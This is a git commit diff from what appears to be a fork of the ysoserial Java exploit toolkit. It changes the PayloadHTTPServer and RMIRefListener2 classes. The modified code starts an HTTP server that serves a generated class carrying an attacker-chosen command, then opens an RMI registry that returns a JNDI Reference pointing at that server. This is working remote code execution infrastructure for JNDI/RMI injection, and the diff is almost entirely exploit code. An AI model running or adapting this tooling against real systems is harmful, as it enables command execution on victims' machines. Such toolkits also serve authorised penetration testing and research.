update RMIRefListener2

Author: wh1t3p1g

src/main/java/ysoserial/exploit/PayloadHTTPServer.java

@@ -16,7 +16,18 @@
  * @author wh1t3P1g
  * @since 2020/2/5
  */
-public class PayloadHTTPServer {
+public class PayloadHTTPServer implements Runnable{
+
+    private int port;
+    private String classname;
+    private String command;
+    private HttpServer server;
+
+    public PayloadHTTPServer(int port, String classname, String command) {
+        this.port = port;
+        this.classname = classname;
+        this.command = command;
+    }
 
     public static void main(String[] args) {
         if ( args.length < 3 ) {
@@ -29,9 +40,14 @@ public static void main(String[] args) {
         String classname = args[1];
         String command = args[2];
 
+        PayloadHTTPServer server = new PayloadHTTPServer(port, classname, command);
+        server.run();
+    }
+
+    public void run(){
         try {
             System.err.println("* Opening Payload HTTPServer on " + port);
-            HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);
+            server = HttpServer.create(new InetSocketAddress(port), 0);
             server.createContext("/"+classname+".class", new PayloadHandler(classname, command));
             server.setExecutor(null);
             server.start();
@@ -71,7 +87,7 @@ private void generate() throws Exception {
 
         @Override
         public void handle(HttpExchange exchange) throws IOException {
-            System.err.println("Have connection from "+exchange.getRemoteAddress());
+            System.err.println("Have request from "+exchange.getRemoteAddress());
             System.err.println("Get request <"+exchange.getRequestMethod()+"> "+exchange.getRequestURI());
             exchange.sendResponseHeaders(200, obj.length);
             OutputStream os = exchange.getResponseBody();

src/main/java/ysoserial/exploit/RMIRefListener2.java

@@ -9,16 +9,6 @@
 import java.rmi.registry.LocateRegistry;
 import java.rmi.registry.Registry;
 
-
-/**
- * Generic JRMP listener
- *
- * Opens up an JRMP listener that will deliver the specified payload to any
- * client connecting to it and making a call.
- *
- * @author mbechler
- *
- */
 @SuppressWarnings ( {
     "restriction"
 } )
@@ -39,20 +29,31 @@ public RMIRefListener2(int port, String factoryName, String factoryURL, Object p
 
     public static final void main ( final String[] args ) throws Exception{
 
-        if ( args.length < 3 ) {
-            System.err.println(RMIRefListener2.class.getName() + " <port> <factory_name> <factory_url>");
+        if ( args.length < 4 ) {
+            System.err.println(RMIRefListener2.class.getName() + "<registryHost:registryPort> <PayloadServerPort> <factory_name> <command>");
             System.exit(-1);
             return;
         }
 
-        Reference reference = new Reference(args[ 1 ],args[ 1 ],args[ 2 ]);
+        String[] registry = args[0].split(":");
+        int registryPort = Integer.parseInt(registry[1]);
+        String host = registry[0];
+
+        int httpServerPort = Integer.parseInt(args[1]);
+        String factoryName = args[2];
+        String factoryURL = "http://"+host+":"+httpServerPort+"/";
+        String command = args[3];
+
+        Reference reference = new Reference(factoryName, factoryName, factoryURL);
         final Object payloadObject = new ReferenceWrapper(reference);
 
         try {
-            int port = Integer.parseInt(args[ 0 ]);
-            System.err.println("* Opening JRMP listener on " + port);
-            System.err.println("* URL: rmi://some-host:"+port+"/"+args[1]);
-            RMIRefListener2 c = new RMIRefListener2(port, args[1], args[2], payloadObject);
+            PayloadHTTPServer server = new PayloadHTTPServer(httpServerPort, factoryName, command);
+            server.run();
+            System.err.println("* Opening JRMP listener on " + registryPort);
+            System.err.println("* URL: rmi://"+host+":"+registryPort+"/"+factoryName);
+            System.err.println("* FactoryURL: "+factoryURL);
+            RMIRefListener c = new RMIRefListener(registryPort, payloadObject);
             c.run();
         }
         catch ( Exception e ) {